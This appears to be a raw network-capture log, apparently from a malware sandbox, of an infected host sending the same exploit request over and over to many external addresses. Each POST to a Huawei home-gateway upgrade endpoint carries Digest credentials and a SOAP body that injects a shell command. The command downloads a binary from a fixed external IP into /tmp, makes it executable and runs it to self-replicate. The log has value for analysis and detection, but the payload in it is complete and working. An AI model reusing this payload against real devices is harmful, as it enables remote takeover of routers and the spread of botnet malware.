                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1716192.168.2.1339418179.91.248.24737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.536323071 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1717192.168.2.134882287.199.43.2837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.536323071 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1718192.168.2.1348918157.6.80.16137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.536364079 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1719192.168.2.135328241.236.159.8137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.536384106 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1720192.168.2.1354434126.255.204.4637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.536385059 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1721192.168.2.134283041.198.49.25037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.536385059 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1722192.168.2.135655290.50.34.12337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.536391973 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1723192.168.2.133314641.104.71.20237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.536461115 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1724192.168.2.1355190220.164.56.18037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.536468983 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1725192.168.2.1353822197.47.43.21237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.536468983 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
